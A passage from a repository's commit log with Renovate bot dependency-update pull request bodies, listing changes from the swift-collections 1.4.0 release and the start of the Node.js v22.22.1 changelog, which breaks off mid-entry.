[@​Azoy](https://redirect.github.com/Azoy) in [#​488](https://redirect.github.com/apple/swift-collections/pull/488) - Add new package trait UnstableSortedCollections by [@​lorentey](https://redirect.github.com/lorentey) in [#​533](https://redirect.github.com/apple/swift-collections/pull/533) - \[RopeModule] Fix warnings by [@​lorentey](https://redirect.github.com/lorentey) in [#​534](https://redirect.github.com/apple/swift-collections/pull/534) - Fix ability to build & test BigString with Xcode & CMake by [@​lorentey](https://redirect.github.com/lorentey) in [#​537](https://redirect.github.com/apple/swift-collections/pull/537) - \[BigString] Bring back Index.\_isUTF16TrailingSurrogate by [@​Azoy](https://redirect.github.com/Azoy) in [#​539](https://redirect.github.com/apple/swift-collections/pull/539) - chore: restrict GitHub workflow permissions - future-proof by [@​incertum](https://redirect.github.com/incertum) in [#​540](https://redirect.github.com/apple/swift-collections/pull/540) - \[BitCollections] Add missing imports for InternalCollectionsUtilities by [@​lorentey](https://redirect.github.com/lorentey) in [#​554](https://redirect.github.com/apple/swift-collections/pull/554) - Compare self.value to other, not itself by [@​SiliconA-Z](https://redirect.github.com/SiliconA-Z) in [#​553](https://redirect.github.com/apple/swift-collections/pull/553) - Change useFloyd heuristic to match comment by [@​SiliconA-Z](https://redirect.github.com/SiliconA-Z) in [#​551](https://redirect.github.com/apple/swift-collections/pull/551) - Typo: symmetric difference should be the xor, not intersection by [@​SiliconA-Z](https://redirect.github.com/SiliconA-Z) in [#​550](https://redirect.github.com/apple/swift-collections/pull/550) - first should get the Initialized elements by [@​SiliconA-Z](https://redirect.github.com/SiliconA-Z) in [#​549](https://redirect.github.com/apple/swift-collections/pull/549) - Replace Container with a far less powerful (but more universal) Iterable construct by [@​lorentey](https://redirect.github.com/lorentey) in [#​543](https://redirect.github.com/apple/swift-collections/pull/543) - Temporarily stop testing RigidArray & UniqueArray on release/6.3 snapshots on Linux by [@​lorentey](https://redirect.github.com/lorentey) in [#​562](https://redirect.github.com/apple/swift-collections/pull/562) - \[RigidArray, HashTrees] Mark deinitializers inlinable by [@​lorentey](https://redirect.github.com/lorentey) in [#​560](https://redirect.github.com/apple/swift-collections/pull/560) - GHA: Add weekly dependabot by [@​bkhouri](https://redirect.github.com/bkhouri) in [#​563](https://redirect.github.com/apple/swift-collections/pull/563) - Work around temporary issue with current 6.3 snapshots by [@​lorentey](https://redirect.github.com/lorentey) in [#​565](https://redirect.github.com/apple/swift-collections/pull/565) - Add `RigidDeque` and `UniqueDeque` by [@​lorentey](https://redirect.github.com/lorentey) in [#​557](https://redirect.github.com/apple/swift-collections/pull/557) - \[Collections module] Stop using `@_exported import` by [@​lorentey](https://redirect.github.com/lorentey) in [#​566](https://redirect.github.com/apple/swift-collections/pull/566) - Delete stray benchmark results files by [@​lorentey](https://redirect.github.com/lorentey) in [#​567](https://redirect.github.com/apple/swift-collections/pull/567) - Assorted `RigidArray`/`UniqueArray` updates by [@​lorentey](https://redirect.github.com/lorentey) in [#​569](https://redirect.github.com/apple/swift-collections/pull/569) - `RigidArray`/`UniqueArray`: Add new copying span initializers by [@​Azoy](https://redirect.github.com/Azoy) in [#​572](https://redirect.github.com/apple/swift-collections/pull/572) - `RigidDeque`/`UniqueDeque`: Add some top-level documentation by [@​lorentey](https://redirect.github.com/lorentey) in [#​571](https://redirect.github.com/apple/swift-collections/pull/571) - Update docs for Container.nextSpan(after:maximumCount:) by [@​lorentey](https://redirect.github.com/lorentey) in [#​574](https://redirect.github.com/apple/swift-collections/pull/574) - Remove workaround for bug in OutputSpan.wUMBP by [@​lorentey](https://redirect.github.com/lorentey) in [#​570](https://redirect.github.com/apple/swift-collections/pull/570) - \[RigidArray, RigidDeque].nextSpan: Validate `maximumCount` by [@​lorentey](https://redirect.github.com/lorentey) in [#​575](https://redirect.github.com/apple/swift-collections/pull/575) - Bump swiftlang/github-workflows/.github/workflows/soundness.yml from 0.0.6 to 0.0.7 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​577](https://redirect.github.com/apple/swift-collections/pull/577) - give constant folding an opportunity to select a much faster code path for empty dictionary (and set) literals by [@​tayloraswift](https://redirect.github.com/tayloraswift) in [#​578](https://redirect.github.com/apple/swift-collections/pull/578) - Bump swiftlang/github-workflows/.github/workflows/swift\_package\_test.yml from 0.0.6 to 0.0.7 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​576](https://redirect.github.com/apple/swift-collections/pull/576) - Ownership-aware Set and Dictionary variants by [@​lorentey](https://redirect.github.com/lorentey) in [#​573](https://redirect.github.com/apple/swift-collections/pull/573) - \[Prerelease] Check API for consistency, fill holes, patch incoherencies by [@​lorentey](https://redirect.github.com/lorentey) in [#​581](https://redirect.github.com/apple/swift-collections/pull/581) - \[BitSet] Amend return value of `update(with:)` method by [@​benrimmington](https://redirect.github.com/benrimmington) in [#​538](https://redirect.github.com/apple/swift-collections/pull/538) - \[BasicContainers] Fix spelling of a source file by [@​lorentey](https://redirect.github.com/lorentey) in [#​585](https://redirect.github.com/apple/swift-collections/pull/585) - Include notes about index mutation in `span(after/before:)` (+ other doc fixes) by [@​natecook1000](https://redirect.github.com/natecook1000) in [#​541](https://redirect.github.com/apple/swift-collections/pull/541) - \[BasicContainers] Finalize requirements for hashed containers by [@​lorentey](https://redirect.github.com/lorentey) in [#​586](https://redirect.github.com/apple/swift-collections/pull/586) - Update README for 1.4.0 by [@​lorentey](https://redirect.github.com/lorentey) in [#​587](https://redirect.github.com/apple/swift-collections/pull/587) - Working towards the 1.4.0 tag by [@​lorentey](https://redirect.github.com/lorentey) in [#​588](https://redirect.github.com/apple/swift-collections/pull/588) - \[BasicContainers] Avoid defining set/dictionary types unless UnstableHashedContainers is enabled by [@​lorentey](https://redirect.github.com/lorentey) in [#​589](https://redirect.github.com/apple/swift-collections/pull/589) - \[BasicContainers] RigidArray: Correct spelling of replacement for deprecated method by [@​lorentey](https://redirect.github.com/lorentey) in [#​590](https://redirect.github.com/apple/swift-collections/pull/590) #### New Contributors - [@​incertum](https://redirect.github.com/incertum) made their first contribution in [#​540](https://redirect.github.com/apple/swift-collections/pull/540) - [@​SiliconA-Z](https://redirect.github.com/SiliconA-Z) made their first contribution in [#​553](https://redirect.github.com/apple/swift-collections/pull/553) - [@​bkhouri](https://redirect.github.com/bkhouri) made their first contribution in [#​563](https://redirect.github.com/apple/swift-collections/pull/563) - [@​dependabot](https://redirect.github.com/dependabot)\[bot] made their first contribution in [#​577](https://redirect.github.com/apple/swift-collections/pull/577) - [@​tayloraswift](https://redirect.github.com/tayloraswift) made their first contribution in [#​578](https://redirect.github.com/apple/swift-collections/pull/578) - [@​benrimmington](https://redirect.github.com/benrimmington) made their first contribution in [#​538](https://redirect.github.com/apple/swift-collections/pull/538) **Full Changelog**: <https://github.com/apple/swift-collections/compare/1.3.0...1.4.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My41OS4wIiwidXBkYXRlZEluVmVyIjoiNDMuNTkuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
6d710f3bdc |
chore: bump up Node.js to v22.22.1 (#14598)
> ℹ️ **Note** > > This PR body was truncated due to platform limits. This PR contains the following updates: | Package | Update | Change | |---|---|---| | [node](https://nodejs.org) ([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.0` → `22.22.1` | --- ### Release Notes <details> <summary>nodejs/node (node)</summary> ### [`v22.22.1`](https://redirect.github.com/nodejs/node/releases/tag/v22.22.1): 2026-03-05, Version 22.22.1 'Jod' (LTS) [Compare Source](https://redirect.github.com/nodejs/node/compare/v22.22.0...v22.22.1) ##### Notable Changes - \[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)] - **build**: test on Python 3.14 (Christian Clauss) [#​59983](https://redirect.github.com/nodejs/node/pull/59983) - \[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)] - **cli**: mark `--heapsnapshot-near-heap-limit` as stable (Joyee Cheung) [#​60956](https://redirect.github.com/nodejs/node/pull/60956) - \[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)] - **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot) [#​61419](https://redirect.github.com/nodejs/node/pull/61419) - \[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)] - **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot) [#​60741](https://redirect.github.com/nodejs/node/pull/60741) - \[[`b6ebf2cd53`](https://redirect.github.com/nodejs/node/commit/b6ebf2cd53)] - **doc**: add avivkeller to collaborators (Aviv Keller) [#​61115](https://redirect.github.com/nodejs/node/pull/61115) - \[[`35854f424d`](https://redirect.github.com/nodejs/node/commit/35854f424d)] - **doc**: add gurgunday to collaborators (Gürgün Dayıoğlu) [#​61094](https://redirect.github.com/nodejs/node/pull/61094) - \[[`5c6a076e5d`](https://redirect.github.com/nodejs/node/commit/5c6a076e5d)] - **meta**: add Renegade334 to collaborators (Renegade334) [#​60714](https://redirect.github.com/nodejs/node/pull/60714) ##### Commits - \[[`5f773488c2`](https://redirect.github.com/nodejs/node/commit/5f773488c2)] - **assert**: use a set instead of an array for faster lookup (Ruben Bridgewater) [#​61076](https://redirect.github.com/nodejs/node/pull/61076) - \[[`feecbb0eab`](https://redirect.github.com/nodejs/node/commit/feecbb0eab)] - **assert,util**: fix deep comparison for sets and maps with mixed types (Ruben Bridgewater) [#​61388](https://redirect.github.com/nodejs/node/pull/61388) - \[[`096095b127`](https://redirect.github.com/nodejs/node/commit/096095b127)] - **benchmark**: add SQLite benchmarks (Guilherme Araújo) [#​61401](https://redirect.github.com/nodejs/node/pull/61401) - \[[`b5fe481415`](https://redirect.github.com/nodejs/node/commit/b5fe481415)] - **benchmark**: use boolean options in benchmark tests (SeokhunEom) [#​60129](https://redirect.github.com/nodejs/node/pull/60129) - \[[`fa9faacacb`](https://redirect.github.com/nodejs/node/commit/fa9faacacb)] - **benchmark**: allow boolean option values (SeokhunEom) [#​60129](https://redirect.github.com/nodejs/node/pull/60129) - \[[`ba8714ac21`](https://redirect.github.com/nodejs/node/commit/ba8714ac21)] - **benchmark**: fix incorrect base64 input in byteLength benchmark (semimikoh) [#​60841](https://redirect.github.com/nodejs/node/pull/60841) - \[[`53596de876`](https://redirect.github.com/nodejs/node/commit/53596de876)] - **benchmark**: use typescript for import cjs benchmark (Joyee Cheung) [#​60663](https://redirect.github.com/nodejs/node/pull/60663) - \[[`e8930e9d7c`](https://redirect.github.com/nodejs/node/commit/e8930e9d7c)] - **benchmark**: focus on import.meta intialization in import-meta benchmark (Joyee Cheung) [#​60603](https://redirect.github.com/nodejs/node/pull/60603) - \[[`1155e412b1`](https://redirect.github.com/nodejs/node/commit/1155e412b1)] - **benchmark**: add per-suite setup option (Joyee Cheung) [#​60574](https://redirect.github.com/nodejs/node/pull/60574) - \[[`e01903d304`](https://redirect.github.com/nodejs/node/commit/e01903d304)] - **benchmark**: improve cpu.sh for safety and usability (Nam Yooseong) [#​60162](https://redirect.github.com/nodejs/node/pull/60162) - \[[`623a405747`](https://redirect.github.com/nodejs/node/commit/623a405747)] - **benchmark**: add benchmark for leaf source text modules (Joyee Cheung) [#​60205](https://redirect.github.com/nodejs/node/pull/60205) - \[[`7f5e7b9f7f`](https://redirect.github.com/nodejs/node/commit/7f5e7b9f7f)] - **benchmark**: add microbench on isInsideNodeModules (Chengzhong Wu) [#​60991](https://redirect.github.com/nodejs/node/pull/60991) - \[[`db132b85a8`](https://redirect.github.com/nodejs/node/commit/db132b85a8)] - **bootstrap**: initialize http proxy after user module loader setup (Joyee Cheung) [#​58938](https://redirect.github.com/nodejs/node/pull/58938) - \[[`66aab9f987`](https://redirect.github.com/nodejs/node/commit/66aab9f987)] - **buffer**: let Buffer.of use heap (Сковорода Никита Андреевич) [#​60503](https://redirect.github.com/nodejs/node/pull/60503) - \[[`c3cf00c671`](https://redirect.github.com/nodejs/node/commit/c3cf00c671)] - **buffer**: speed up concat via TypedArray#set (Gürgün Dayıoğlu) [#​60399](https://redirect.github.com/nodejs/node/pull/60399) - \[[`f6fad231e9`](https://redirect.github.com/nodejs/node/commit/f6fad231e9)] - **build**: skip sscache action on non-main branches (Joyee Cheung) [#​61790](https://redirect.github.com/nodejs/node/pull/61790) - \[[`2145f91f6b`](https://redirect.github.com/nodejs/node/commit/2145f91f6b)] - **build**: update android-patches/trap-handler.h.patch (Mo Luo) [#​60369](https://redirect.github.com/nodejs/node/pull/60369) - \[[`5b49759dd8`](https://redirect.github.com/nodejs/node/commit/5b49759dd8)] - **build**: update devcontainer.json to use paired nix env (Joyee Cheung) [#​61414](https://redirect.github.com/nodejs/node/pull/61414) - \[[`24724cde40`](https://redirect.github.com/nodejs/node/commit/24724cde40)] - **build**: fix misplaced comma in ldflags (hqzing) [#​61294](https://redirect.github.com/nodejs/node/pull/61294) - \[[`c57a19934e`](https://redirect.github.com/nodejs/node/commit/c57a19934e)] - **build**: fix crate vendor file checksums on windows (Chengzhong Wu) [#​61329](https://redirect.github.com/nodejs/node/pull/61329) - \[[`8659d7cd07`](https://redirect.github.com/nodejs/node/commit/8659d7cd07)] - **build**: fix inconsistent quoting in `Makefile` (Antoine du Hamel) [#​60511](https://redirect.github.com/nodejs/node/pull/60511) - \[[`44f339b315`](https://redirect.github.com/nodejs/node/commit/44f339b315)] - **build**: remove temporal updater (Chengzhong Wu) [#​61151](https://redirect.github.com/nodejs/node/pull/61151) - \[[`d60a6cebd5`](https://redirect.github.com/nodejs/node/commit/d60a6cebd5)] - **build**: update test-wpt-report to use NODE instead of OUT\_NODE (Filip Skokan) [#​61024](https://redirect.github.com/nodejs/node/pull/61024) - \[[`34ccf187f5`](https://redirect.github.com/nodejs/node/commit/34ccf187f5)] - **build**: skip build-ci on actions with a separate test step (Chengzhong Wu) [#​61073](https://redirect.github.com/nodejs/node/pull/61073) - \[[`7b19e101a2`](https://redirect.github.com/nodejs/node/commit/7b19e101a2)] - **build**: run embedtest with node\_g when BUILDTYPE=Debug (Chengzhong Wu) [#​60850](https://redirect.github.com/nodejs/node/pull/60850) - \[[`9408c4459f`](https://redirect.github.com/nodejs/node/commit/9408c4459f)] - **build**: upgrade Python linter ruff, add rules ASYNC,PERF (Christian Clauss) [#​59984](https://redirect.github.com/nodejs/node/pull/59984) - \[[`2166ec7f0f`](https://redirect.github.com/nodejs/node/commit/2166ec7f0f)] - **build**: use call command when calling python configure (Jacob Nichols) [#​60098](https://redirect.github.com/nodejs/node/pull/60098) - \[[`73ef70145d`](https://redirect.github.com/nodejs/node/commit/73ef70145d)] - **build**: remove V8\_COMPRESS\_POINTERS\_IN\_ISOLATE\_CAGE defs (Joyee Cheung) [#​60296](https://redirect.github.com/nodejs/node/pull/60296) - \[[`7b93a65f27`](https://redirect.github.com/nodejs/node/commit/7b93a65f27)] - **build**: test on Python 3.14 (Christian Clauss) [#​59983](https://redirect.github.com/nodejs/node/pull/59983) - \[[`508ce6ec6c`](https://redirect.github.com/nodejs/node/commit/508ce6ec6c)] - **build, src**: fix include paths for vtune files (Rahul) [#​59999](https://redirect.github.com/nodejs/node/pull/59999) - \[[`c89d3cd570`](https://redirect.github.com/nodejs/node/commit/c89d3cd570)] - **build,tools**: fix addon build deadlock on errors (Vladimir Morozov) [#​61321](https://redirect.github.com/nodejs/node/pull/61321) - \[[`40904a0591`](https://redirect.github.com/nodejs/node/commit/40904a0591)] - **build,win**: update WinGet configurations to Python 3.14 (Mike McCready) [#​61431](https://redirect.github.com/nodejs/node/pull/61431) - \[[`6d6742e7db`](https://redirect.github.com/nodejs/node/commit/6d6742e7db)] - **child\_process**: treat ipc length header as unsigned uint32 (Ryuhei Shima) [#​61344](https://redirect.github.com/nodejs/node/pull/61344) - \[[`6063d888fe`](https://redirect.github.com/nodejs/node/commit/6063d888fe)] - **cli**: mark --heapsnapshot-near-heap-limit as stable (Joyee Cheung) [#​60956](https://redirect.github.com/nodejs/node/pull/60956) - \[[`3d324a0f88`](https://redirect.github.com/nodejs/node/commit/3d324a0f88)] - **cluster**: fix port reuse between cluster (Ryuhei Shima) [#​60141](https://redirect.github.com/nodejs/node/pull/60141) - \[[`40a58709b4`](https://redirect.github.com/nodejs/node/commit/40a58709b4)] - **console**: optimize single-string logging (Gürgün Dayıoğlu) [#​60422](https://redirect.github.com/nodejs/node/pull/60422) - \[[`d950b151a2`](https://redirect.github.com/nodejs/node/commit/d950b151a2)] - **crypto**: update root certificates to NSS 3.119 (Node.js GitHub Bot) [#​61419](https://redirect.github.com/nodejs/node/pull/61419) - \[[`4f42f8c428`](https://redirect.github.com/nodejs/node/commit/4f42f8c428)] - **crypto**: update root certificates to NSS 3.117 (Node.js GitHub Bot) [#​60741](https://redirect.github.com/nodejs/node/pull/60741) - \[[`a87499ae25`](https://redirect.github.com/nodejs/node/commit/a87499ae25)] - **crypto**: ensure documented RSA-PSS saltLength default is used (Filip Skokan) [#​60662](https://redirect.github.com/nodejs/node/pull/60662) - \[[`8c65cc11e2`](https://redirect.github.com/nodejs/node/commit/8c65cc11e2)] - **crypto**: update root certificates to NSS 3.116 (Node.js GitHub Bot) [#​59956](https://redirect.github.com/nodejs/node/pull/59956) - \[[`91dc00a2c1`](https://redirect.github.com/nodejs/node/commit/91dc00a2c1)] - **debugger**: fix event listener leak in the run command (Joyee Cheung) [#​60464](https://redirect.github.com/nodejs/node/pull/60464) - \[[`0781bd3764`](https://redirect.github.com/nodejs/node/commit/0781bd3764)] - **deps**: V8: backport [`6a0a25a`](https://redirect.github.com/nodejs/node/commit/6a0a25abaed3) (Vivian Wang) [#​61688](https://redirect.github.com/nodejs/node/pull/61688) - \[[`0cf1f9c3e9`](https://redirect.github.com/nodejs/node/commit/0cf1f9c3e9)] - **deps**: update googletest to [`8508785`](https://redirect.github.com/nodejs/node/commit/85087857ad10bd407cd6ed2f52f7ea9752db621f) (Node.js GitHub Bot) [#​61417](https://redirect.github.com/nodejs/node/pull/61417) - \[[`521b4b1f07`](https://redirect.github.com/nodejs/node/commit/521b4b1f07)] - **deps**: update sqlite to 3.51.2 (Node.js GitHub Bot) [#​61339](https://redirect.github.com/nodejs/node/pull/61339) - \[[`58b9d219a3`](https://redirect.github.com/nodejs/node/commit/58b9d219a3)] - **deps**: update icu to 78.2 (Node.js GitHub Bot) [#​60523](https://redirect.github.com/nodejs/node/pull/60523) - \[[`cbc1e4306d`](https://redirect.github.com/nodejs/node/commit/cbc1e4306d)] - **deps**: update zlib to 1.3.1-e00f703 (Node.js GitHub Bot) [#​61135](https://redirect.github.com/nodejs/node/pull/61135) - \[[`db59c35ed8`](https://redirect.github.com/nodejs/node/commit/db59c35ed8)] - **deps**: update cjs-module-lexer to 2.2.0 (Node.js GitHub Bot) [#​61271](https://redirect.github.com/nodejs/node/pull/61271) - \[[`c18518ee3c`](https://redirect.github.com/nodejs/node/commit/c18518ee3c)] - **deps**: update nbytes to 0.1.2 (Node.js GitHub Bot) [#​61270](https://redirect.github.com/nodejs/node/pull/61270) - \[[`376df62d63`](https://redirect.github.com/nodejs/node/commit/376df62d63)] - **deps**: update timezone to 2025c (Node.js GitHub Bot) [#​61138](https://redirect.github.com/nodejs/node/pull/61138) - \[[`993e905302`](https://redirect.github.com/nodejs/node/commit/993e905302)] - **deps**: update simdjson to 4.2.4 (Node.js GitHub Bot) [#​61056](https://redirect.github.com/nodejs/node/pull/61056) - \[[`b72fd2a5d3`](https://redirect.github.com/nodejs/node/commit/b72fd2a5d3)] - **deps**: update googletest to [`065127f`](https://redirect.github.com/nodejs/node/commit/065127f1e4b46c5f14fc73cf8d323c221f9dc68e) (Node.js GitHub Bot) [#​61055](https://redirect.github.com/nodejs/node/pull/61055) - \[[`d765147405`](https://redirect.github.com/nodejs/node/commit/d765147405)] - **deps**: update sqlite to 3.51.1 (Node.js GitHub Bot) [#​60899](https://redirect.github.com/nodejs/node/pull/60899) - \[[`37abe2a7d2`](https://redirect.github.com/nodejs/node/commit/37abe2a7d2)] - **deps**: update zlib to 1.3.1-63d7e16 (Node.js GitHub Bot) [#​60898](https://redirect.github.com/nodejs/node/pull/60898) - \[[`97241fcb86`](https://redirect.github.com/nodejs/node/commit/97241fcb86)] - **deps**: update sqlite to 3.51.0 (Node.js GitHub Bot) [#​60614](https://redirect.github.com/nodejs/node/pull/60614) - \[[`3669c7b4f4`](https://redirect.github.com/nodejs/node/commit/3669c7b4f4)] - **deps**: update simdjson to 4.2.2 (Node.js GitHub Bot) [#​60740](https://redirect.github.com/nodejs/node/pull/60740) - \[[`9a056ec89c`](https://redirect.github.com/nodejs/node/commit/9a056ec89c)] - **deps**: update googletest to [`1b96fa1`](https://redirect.github.com/nodejs/node/commit/1b96fa13f549387b7549cc89e1a785cf143a1a50) (Node.js GitHub Bot) [#​60739](https://redirect.github.com/nodejs/node/pull/60739) - \[[`b5803b3ea0`](https://redirect.github.com/nodejs/node/commit/b5803b3ea0)] - **deps**: update minimatch to 10.1.1 (Node.js GitHub Bot) [#​60543](https://redirect.github.com/nodejs/node/pull/60543) - \[[`5bf99f3d46`](https://redirect.github.com/nodejs/node/commit/5bf99f3d46)] - **deps**: update cjs-module-lexer to 2.1.1 (Node.js GitHub Bot) [#​60646](https://redirect.github.com/nodejs/node/pull/60646) - \[[`801f187357`](https://redirect.github.com/nodejs/node/commit/801f187357)] - **deps**: update simdjson to 4.2.1 (Node.js GitHub Bot) [#​60644](https://redirect.github.com/nodejs/node/pull/60644) - \[[`03c16e5a4c`](https://redirect.github.com/nodejs/node/commit/03c16e5a4c)] - **deps**: update simdjson to 4.1.0 (Node.js GitHub Bot) [#​60542](https://redirect.github.com/nodejs/node/pull/60542) - \[[`2ebfc2ca56`](https://redirect.github.com/nodejs/node/commit/2ebfc2ca56)] - **deps**: update amaro to 1.1.5 (Node.js GitHub Bot) [#​60541](https://redirect.github.com/nodejs/node/pull/60541) - \[[`d24ba4fed6`](https://redirect.github.com/nodejs/node/commit/d24ba4fed6)] - **deps**: update simdjson to 4.0.7 (Node.js GitHub Bot) [#​59883](https://redirect.github.com/nodejs/node/pull/59883) - \[[`9480a139bf`](https://redirect.github.com/nodejs/node/commit/9480a139bf)] - **deps**: update googletest to [`279f847`](https://redirect.github.com/nodejs/node/commit/279f847) (Node.js GitHub Bot) [#​60219](https://redirect.github.com/nodejs/node/pull/60219) - \[[`635e67379e`](https://redirect.github.com/nodejs/node/commit/635e67379e)] - **deps**: update archs files for openssl-3.5.5 (Node.js GitHub Bot) [#​61547](https://redirect.github.com/nodejs/node/pull/61547) - \[[`c7b774047d`](https://redirect.github.com/nodejs/node/commit/c7b774047d)] - **deps**: upgrade openssl sources to openssl-3.5.5 (Node.js GitHub Bot) [#​61547](https://redirect.github.com/nodejs/node/pull/61547) - \[[`5b324d7d7f`](https://redirect.github.com/nodejs/node/commit/5b324d7d7f)] - **deps**: update corepack to 0.34.6 (Node.js GitHub Bot) [#​61510](https://redirect.github.com/nodejs/node/pull/61510) - \[[`eef8ba0667`](https://redirect.github.com/nodejs/node/commit/eef8ba0667)] - **deps**: update corepack to 0.34.5 (Node.js GitHub Bot) [#​60842](https://redirect.github.com/nodejs/node/pull/60842) - \[[`490f7c7fb1`](https://redirect.github.com/nodejs/node/commit/490f7c7fb1)] - **deps**: update corepack to 0.34.4 (Node.js GitHub Bot) [#​60643](https://redirect.github.com/nodejs/node/pull/60643) - \[[`66903ea3b3`](https://redirect.github.com/nodejs/node/commit/66903ea3b3)] - **deps**: update corepack to 0.34.2 (Node.js GitHub Bot) [#​60550](https://redirect.github.com/nodejs/node/pull/60550) - \[[`a2f0b69282`](https://redirect.github.com/nodejs/node/commit/a2f0b69282)] - **deps**: update corepack to 0.34.1 (Node.js GitHub Bot) [#​60314](https://redirect.github.com/nodejs/node/pull/60314) - \[[`c8044a48a6`](https://redirect.github.com/nodejs/node/commit/c8044a48a6)] - **deps**: V8: backport [`2e4c5cf`](https://redirect.github.com/nodejs/node/commit/2e4c5cf9b112) (Michaël Zasso) [#​60654](https://redirect.github.com/nodejs/node/pull/60654) - \[[`642f518198`](https://redirect.github.com/nodejs/node/commit/642f518198)] - **doc**: supported toolchain with Visual Studio 2022 only (Mike McCready) [#​61451](https://redirect.github.com/nodejs/node/pull/61451) - \[[`625f674487`](https://redirect.github.com/nodejs/node/commit/625f674487)] - **doc**: move Security-Team from TSC to SECURITY (Rafael Gonzaga) [#​61495](https://redirect.github.com/nodejs/node/pull/61495) - \[[`029e32f8ba`](https://redirect.github.com/nodejs/node/commit/029e32f8ba)] - **doc**: added `requestOCSP` option to `tls.connect` (ikeyan) [#​61064](https://redirect.github.com/nodejs/node/pull/61064) - \[[`68e33dfa89`](https://redirect.github.com/nodejs/node/commit/68e33dfa89)] - **doc**: restore [@​ChALkeR](https://redirect.github.com/ChALkeR) to collaborators (Сковорода Никита Андреевич) [#​61553](https://redirect.github.com/nodejs/node/pull/61553) - \[[`e016770d62`](https://redirect.github.com/nodejs/node/commit/e016770d62)] - **doc**: update IBM/Red Hat volunteers with dedicated project time (Beth Griggs) [#​61588](https://redirect.github.com/nodejs/node/pull/61588) - \[[`ec63954657`](https://redirect.github.com/nodejs/node/commit/ec63954657)] - **doc**: mention constructor comparison in assert.deepStrictEqual (Hamza Kargin) [#​60253](https://redirect.github.com/nodejs/node/pull/60253) - \[[`c8e1563a98`](https://redirect.github.com/nodejs/node/commit/c8e1563a98)] - **doc**: add CVE delay mention (Rafael Gonzaga) [#​61465](https://redirect.github.com/nodejs/node/pull/61465) - \[[`4b00cf2b54`](https://redirect.github.com/nodejs/node/commit/4b00cf2b54)] - **doc**: include OpenJSF handle for security stewards (Rafael Gonzaga) [#​61454](https://redirect.github.com/nodejs/node/pull/61454) - \[[`4b73bf5bc8`](https://redirect.github.com/nodejs/node/commit/4b73bf5bc8)] - **doc**: clarify process.argv\[1] behavior for -e/--eval (Jeevankumar S) [#​61366](https://redirect.github.com/nodejs/node/pull/61366) - \[[`d3151df4b3`](https://redirect.github.com/nodejs/node/commit/d3151df4b3)] - **doc**: remove Windows Dev Home instructions from BUILDING (Mike McCready) [#​61434](https://redirect.github.com/nodejs/node/pull/61434) - \[[`2323462e35`](https://redirect.github.com/nodejs/node/commit/2323462e35)] - **doc**: clarify TypedArray properties on Buffer (Roman Reiss) [#​61355](https://redirect.github.com/nodejs/node/pull/61355) - \[[`6c5478c8b2`](https://redirect.github.com/nodejs/node/commit/6c5478c8b2)] - **doc**: note resume build should not be done on node-test-commit (Stewart X Addison) [#​61373](https://redirect.github.com/nodejs/node/pull/61373) - \[[`ba4a043103`](https://redirect.github.com/nodejs/node/commit/ba4a043103)] - **doc**: refine WebAssembly error documentation (sangwook) [#​61382](https://redirect.github.com/nodejs/node/pull/61382) - \[[`cd315ea589`](https://redirect.github.com/nodejs/node/commit/cd315ea589)] - **doc**: add deprecation history for url.parse (Eng Zer Jun) [#​61389](https://redirect.github.com/nodejs/node/pull/61389) - \[[`42db0c392d`](https://redirect.github.com/nodejs/node/commit/42db0c392d)] - **doc**: add marco and rafael in last sec release (Marco Ippolito) [#​61383](https://redirect.github.com/nodejs/node/pull/61383) - \[[`4c3b680fc7`](https://redirect.github.com/nodejs/node/commit/4c3b680fc7)] - **doc**: packages: example of private import switch to internal (coderaiser) [#​61343](https://redirect.github.com/nodejs/node/pull/61343) - \[[`684d15e421`](https://redirect.github.com/nodejs/node/commit/684d15e421)] - **doc**: add esm and cjs examples to node:v8 (Alfredo González) [#​61328](https://redirect.github.com/nodejs/node/pull/61328) - \[[`c3f9c7a7d9`](https://redirect.github.com/nodejs/node/commit/c3f9c7a7d9)] - **doc**: added 'secure' event to tls.TLSSocket (ikeyan) [#​61066](https://redirect.github.com/nodejs/node/pull/61066) - \[[`aa9acad5ca`](https://redirect.github.com/nodejs/node/commit/aa9acad5ca)] - **doc**: restore [@​watilde](https://redirect.github.com/watilde) to collaborators (Daijiro Wachi) [#​61350](https://redirect.github.com/nodejs/node/pull/61350) - \[[`9cafec084e`](https://redirect.github.com/nodejs/node/commit/9cafec084e)] - **doc**: run license-builder (github-actions\[bot]) [#​61348](https://redirect.github.com/nodejs/node/pull/61348) - \[[`cdb12ccbc6`](https://redirect.github.com/nodejs/node/commit/cdb12ccbc6)] - **doc**: document ALPNCallback option for TLSSocket constructor (ikeyan) [#​61331](https://redirect.github.com/nodejs/node/pull/61331) - \[[`461c5e65c5`](https://redirect.github.com/nodejs/node/commit/461c5e65c5)] - **doc**: update MDN links (Livia Medeiros) [#​61062](https://redirect.github.com/nodejs/node/pull/61062) - \[[`dde45baeab`](https://redirect.github.com/nodejs/node/commit/dde45baeab)] - **doc**: add documentation for process.traceProcessWarnings (Alireza Ebrahimkhani) [#​53641](https://redirect.github.com/nodejs/node/pull/53641) - \[[`59a7aeec92`](https://redirect.github.com/nodejs/node/commit/59a7aeec92)] - **doc**: fix filename typo (Hardanish Singh) [#​61297](https://redirect.github.com/nodejs/node/pull/61297) - \[[`9a0a40d1ed`](https://redirect.github.com/nodejs/node/commit/9a0a40d1ed)] - **doc**: fix typos and grammar in `BUILDING.md` & `onboarding.md` (Hardanish 